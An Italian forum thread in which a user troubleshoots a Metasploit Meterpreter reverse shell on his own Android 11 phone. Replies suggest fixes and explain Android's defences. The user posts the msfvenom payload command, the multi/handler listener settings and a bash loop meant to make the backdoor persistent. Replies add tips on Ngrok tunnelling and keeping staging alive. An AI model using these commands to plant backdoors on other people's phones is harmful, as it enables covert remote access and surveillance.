Domanda metasploit chiude sessione (Reason:Died)

D

Deleted member 284446

Buongiorno, volevo chiedervi una info su metasploit: dopo aver acceduto al mio telefono android con metasploit, mi appare il prompt meterpreter, ma poco dopo pochi secondi mi si chiude la sesssione con il messaggio 'Meterpreter session 1 closed . Reason :died'? Ho provato a capire e cercare in giro, ma non ho trovato nulla. Qualcuno ha avuto lo stesso problema? Potete aiutarmi.Grazie
 
Probabilmente la reverse shell viene killata da Android.
Che versione di Android usi?
Hai degli antivirus o robe simili (sia sulla macchina con Metasploit, sia sul cell)?
 
Ciao Oxbro, grazie per la risposta: sul mio cell ho Android 11 senza antivirus.Sulla mia macchina virtuale dove gira metasploit ho Kali Linux senza antivirus.
 
Ciao Oxbro, grazie per la risposta: sul mio cell ho Android 11 senza antivirus.Sulla mia macchina virtuale dove gira metasploit ho Kali Linux senza antivirus.
Molto probabilmente ci sarà qualche meccanismo di sicurezza su Android 11 che fa chiudere la reverse shell o qualche incompatibilità con l'applicazione contenente meterpreter. Hai un cellulare vecchio (possibilmente Android 6 o precedente) com cui fare altri test? In questo modo potresti capire se il problema è relativo all'OS o ad altro.
In alternativa prova a scaricare Genymotion (emulatore per android) con diverse versioni di Android, magari 6 9 e 11, in modo da capire se è un comportamento consistente tra tutte le versioni o se a un certo punto è cambiato qualcosa
 
Il thread è troppo banale, non è possibile fornire una risposta esaustiva se non leaki la configurazione che hai usato per ottenere la reverse shell

1) Assicurati che il listener sia compatibile col payload
2) Assicurati d'aver fatto port forwarding, usa Ngrok in alternativa (col piano pro possibilmente, col piano free è instabile)
3) Assicurati che lo schermo di Android non entri in sleep durante la fase di staging, o la sessione verrà killata dopo poco. Meterpreter ha anche un comando apposito che impedisce allo schermo di Android di oscurarsi, ma puoi aggiungerlo anche direttamente al payload con msfvenom.
 
Ultima modifica da un moderatore:
Grazie a tutti e due per la risposta. Faccio delle verifiche.
Messaggio unito automaticamente:

Ne approfitto per chiedervi anche un'altra info su un'altro problema: non riesco a mantenere l'aggancio al telefono ogni volta che provo a collegarmi da metasploit.
Le istruzioni che uso da prompt meterpreter sono:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IPRIVATO
set LPORT PORTA

però rimane in attesa senza agganciarsi. Le prove le stò facendo in Lan.

Per connettermi devo sempre premere la mia applicazione sul telefono.

Ho provato per la persistenza della backdoor , a creare il file con le seguenti istruzioni:

#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done

ma quando provo da metasploit a lanciare il file script con estensione sh mi dà errore : Denial Permission.

Non sono riuscito a trovare un motivo per cui mi dà il messaggio di cui sopra: probabilmente sul telefono non ho i permessi per poterlo fare?Ho visto vari video, ma pare che quando provano a lanciare il file .sh funziona sempre.Dove sbaglio?
Grazie
Messaggio unito automaticamente:

L'istruzione msfvenom che uso è:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 R > /var/www/html/test.apk

metasploit versione 6
 
Quello è il metodo vecchio e non funziona su Android 11, quello nuovo non me lo ricordo, l'ho perso... Non mi occupo di Android quindi ho smarrito le informazioni. Comunque tutti gli script che trovi su Google sono fallati e non funzionano più su Android 11/12
Messaggio unito automaticamente:

Senza contare che dovrei stare a smucinare 11 GB di archivi di ricerche per starlo a ritrovare
 
Quindi nessuno conosce queste risposte,e chi lo saprebbe non può rendersi disponibile.Ottimo.Arrivederci
 
Quindi nessuno conosce queste risposte,e chi lo saprebbe non può rendersi disponibile.Ottimo.Arrivederci
Czonta tha detto che quel metodo non worka su Android 11, quindi è inutile insistere, o cambi versione di android o trovi un altro metodo, o programmi tu una reverse per android.
Metasploit e compagnia bella non risolve sempre tutto.
 
Ultima modifica:
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 2000
done
Questo script non può funzionare perchè cerca di avviare l'applicazione utilizzando -user 0, cioè l'utente root, di cui non disponi i privilegi. Per fare in modo che funzioni dovresti cambiare l'identificativo 0 con quello del tuo utente, che di solito puoi ricavare con il comando id o da /etc/passwd

Tutto il resto del procedimento che hai mostrato è un procedimento standard che in uno ambiente di laboratorio dovrebbe funzionare. Visto però che stai usando un dispositivo reale, per lo più moderno, con tutte le ultime implementazioni di sicurezza di Google, serve fare ricerca per capire come mai non stia funzionando. Nessuno qui ha la bacchetta magica, nè abbiamo la scritta "Dizionario universale dell'hacking" scritto in fronte. Hacking vuol dire ricerca, sperimentazione, ed è ciò che si fa quando si hanno degli errori.

Detto questo, ribadisco i test che potresti fare per cercare di capire (tu) e aiutare (noi) a comprendere quale possa essere il motivo per cui non stia funzionando:
Molto probabilmente ci sarà qualche meccanismo di sicurezza su Android 11 che fa chiudere la reverse shell o qualche incompatibilità con l'applicazione contenente meterpreter. Hai un cellulare vecchio (possibilmente Android 6 o precedente) com cui fare altri test? In questo modo potresti capire se il problema è relativo all'OS o ad altro.
In alternativa prova a scaricare Genymotion (emulatore per android) con diverse versioni di Android, magari 6 9 e 11, in modo da capire se è un comportamento consistente tra tutte le versioni o se a un certo punto è cambiato qualcosa


Facci sapere
 
  • Mi piace
Reazioni: hackynonpointer
Ti spieghiamo in parole povere, non è che non vogliamo aiutarti. E' che Android recentemente si è trasformato in un dispositivo quasi inespugnabile, è secondo solamente ad iOS iPhone in fatto di sicurezza. Puoi tranquillamente scrivere (o scaricare, modificare e ricompilare) tutti i malware che vuoi per questo dispositivo: per quanto siano perfetti hanno un tasso di attecchimento bassissimo, solamente a causa della security policy, che è estremamente restrittiva. La feature di sicurezza più solida in Android, sono i permessi dell'user, che da soli bastano per complicare assai ogni operazione che cerchi di fare con la shell. Se il telefono non è rootato puoi fare ben poco, alcune agenzie di sicurezza come NSA possono sviluppare degli exploit che corrompono la security policy di questi dispositivi, tuttavia non sono di dominio pubblico, perché categorizzati come armi informatiche vere e proprie. L'estrema diffusione di Android, ha comportato una presa di posizione molto severa da parte dei suoi produttori per garantire la sicurezza. Se provi ad attaccare un dispositivo Android datato, hai buone possibilità di riuscita, ma con Android 11/12 puoi fare davvero ben poco. Io d'altro canto non ho neppure tempo di studiare le falle in Android, perché non è un lavoro semplice. Provando, ad esempio, ad installare un keylogger su Android 10+, noterai fin da subito come l'OS si accorge che l'app non proviene da Play Store, cercando di impedirne l'installazione chiedendo varie conferme all'user. Puoi aggirare quest'ostacolo firmando il keylogger, ma Android continuerà comunque a chiedere altri permessi d'installazione, sollevando dubbi in merito alla sicurezza dell'app. Questo accade perché, se ci fai caso, le app per girare in Android necessitano obbligatoriamente di essere installate prima di essere eseguite, a differenza di Windows, che invece può eseguire standalone .exe saltando ogni procedura di verifica o installazione, è posto solamente un AV alla sicurezza, ed è l'unica risorsa effettiva che impedisce ai malware su Windows di girare. Per creare un malware effettivo al 100% per Android devi letteralmente riuscire a pubblicarlo prima su Play Store spacciandolo (o nascondendolo) in un'app legittima. Buona fortuna a riuscirci senza essere scoperto, vuoi un mio consiglio? Creati app con codici malevoli per conto tuo, e poi tienitele solo come "trofeo" di studio, come ho fatto io.